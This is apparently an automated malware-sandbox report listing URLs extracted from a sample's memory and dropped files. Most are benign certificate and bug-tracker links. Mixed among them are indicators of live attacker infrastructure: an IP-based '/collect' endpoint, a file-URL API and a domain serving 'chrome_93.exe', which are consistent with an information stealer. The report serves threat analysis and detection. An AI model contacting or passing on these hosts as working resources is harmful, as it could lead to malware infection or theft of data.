                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                      Source: chrome.exe, 00000002.00000003.2131752196.00002B4400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131617079.00002B44010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131395309.00002B4400F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131870638.00002B44010F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133191790.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131752196.00002B4400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133154762.00002B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131617079.00002B44010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131395309.00002B4400F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133219370.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131870638.00002B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131687525.00002B4401124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133101867.00002B4400CD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133191790.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131752196.00002B4400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133154762.00002B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131617079.00002B44010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131395309.00002B4400F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133219370.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131870638.00002B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131687525.00002B4401124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133101867.00002B4400CD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133191790.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131752196.00002B4400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133154762.00002B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131617079.00002B44010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131395309.00002B4400F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133219370.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131870638.00002B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131687525.00002B4401124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133101867.00002B4400CD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133191790.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131752196.00002B4400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133154762.00002B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131617079.00002B44010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131395309.00002B4400F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133219370.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131870638.00002B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131687525.00002B4401124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133101867.00002B4400CD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                      Source: chromecache_485.4.drString found in binary or memory: http://www.broofa.com
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: hwWxZRwpeL.exe, hwWxZRwpeL.exe, 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610588124.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2602601868.000000001AF62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://194.26.232.61/api/latest-file-url?browser=$
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://194.26.232.61/api/latest-file-url?browser=android
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drString found in binary or memory: https://194.26.232.61/collect
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, CFCGIIEH.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                      Source: chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://api.ipify.org?format=json
                      Source: chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmp, chromecache_485.4.dr, chromecache_484.4.drString found in binary or memory: https://apis.google.com
                      Source: msedge.exe, 00000007.00000002.2317936593.000002995A739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comdll
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2605979506.0000000021160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://campuspersever.es/
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2605979506.0000000021160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://campuspersever.es/&
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2605979506.0000000021160000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2605979506.00000000211C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://campuspersever.es/chrome_93.exe
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2605979506.00000000211C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://campuspersever.es/chrome_93.exeL
